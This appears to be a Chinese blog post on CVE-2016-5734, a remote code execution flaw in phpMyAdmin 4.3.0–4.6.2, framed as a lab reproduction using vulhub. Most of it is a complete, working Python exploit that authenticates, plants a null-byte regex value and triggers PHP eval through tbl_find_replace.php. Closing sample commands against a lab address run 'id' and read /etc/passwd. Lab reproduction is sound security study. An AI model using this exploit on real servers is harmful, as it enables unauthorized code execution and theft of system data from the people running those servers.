> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [www.cnblogs.com](https://www.cnblogs.com/xhds/p/12579289.html)
目录
**环境复现:**https://github.com/vulhub/vulhub
线上平台: 榆林学院内可使用协会内部的网络安全实验平台
phpMyAdmin 是一套开源的、基于 Web 的 MySQL 数据库管理工具。
phpmyadmin4.3.0-4.6.2
待更新....
漏洞利用 py
#!/usr/bin/env python
"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""
import requests
import argparse
import sys
\_\_author\_\_ = "@iamsecurity"
if \_\_name\_\_ == '\_\_main\_\_':
parser = argparse.ArgumentParser()
parser.add\_argument("url", type=str, help="URL with path to PMA")
parser.add\_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
parser.add\_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
parser.add\_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
parser.add\_argument("-d", "--dbs", type=str, help="Existing database at a server")
parser.add\_argument("-T", "--table", type=str, help="Custom table name for exploit.")
arguments = parser.parse\_args()
url\_to\_pma = arguments.url
uname = arguments.user
upass = arguments.pwd
if arguments.dbs:
db = arguments.dbs
else:
db = "test"
token = False
custom\_table = False
if arguments.table:
custom\_table = True
table = arguments.table
else:
table = "prgpwn"
if arguments.cmd:
payload = arguments.cmd
else:
payload = "system('uname -a');"
size = 32
s = requests.Session()
# you can manually add proxy support it's very simple ;)
# s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
s.verify = False
sql = '''CREATE TABLE \`{0}\` (
\`first\` varchar(10) CHARACTER SET utf8 NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO \`{0}\` (\`first\`) VALUES (UNHEX('302F6500'));
'''.format(table)
# get\_token
resp = s.post(url\_to\_pma + "/?lang=en", dict(
pma\_username=uname,
pma\_password=upass
))
if resp.status\_code is 200:
token\_place = resp.text.find("token=") + 6
token = resp.text\[token\_place:token\_place + 32\]
if token is False:
print("Cannot get valid authorization token.")
sys.exit(1)
if custom\_table is False:
data = {
"is\_js\_confirmed": "0",
"db": db,
"token": token,
"pos": "0",
"sql\_query": sql,
"sql\_delimiter": ";",
"show\_query": "0",
"fk\_checks": "0",
"SQL": "Go",
"ajax\_request": "true",
"ajax\_page\_request": "true",
}
resp = s.post(url\_to\_pma + "/import.php", data, cookies=requests.utils.dict\_from\_cookiejar(s.cookies))
if resp.status\_code == 200:
if "success" in resp.json():
if resp.json()\["success"\] is False:
first = resp.json()\["error"\]\[resp.json()\["error"\].find("<code>")+6:\]
error = first\[:first.find("</code>")\]
if "already exists" in error:
print(error)
else:
print("ERROR: " + error)
sys.exit(1)
# build exploit
exploit = {
"db": db,
"table": table,
"token": token,
"goto": "sql.php",
"find": "0/e\\0",
"replaceWith": payload,
"columnIndex": "0",
"useRegex": "on",
"submit": "Go",
"ajax\_request": "true"
}
resp = s.post(
url\_to\_pma + "/tbl\_find\_replace.php", exploit, cookies=requests.utils.dict\_from\_cookiejar(s.cookies)
)
if resp.status\_code == 200:
result = resp.json()\["message"\]\[resp.json()\["message"\].find("</a>")+8:\]
if len(result):
print("result: " + result)
sys.exit(0)
print(
"Exploit failed!\\n"
"Try to manually set exploit parameters like --table, --database and --token.\\n"
"Remember that servers with PHP version greater than 5.4.6"
" is not exploitable, because of warning about null byte in regexp"
)
sys.exit(1)
View Code
python PhpMyAdmin\_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system('id')"
python PhpMyAdmin\_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system('cat /etc/passwd')"
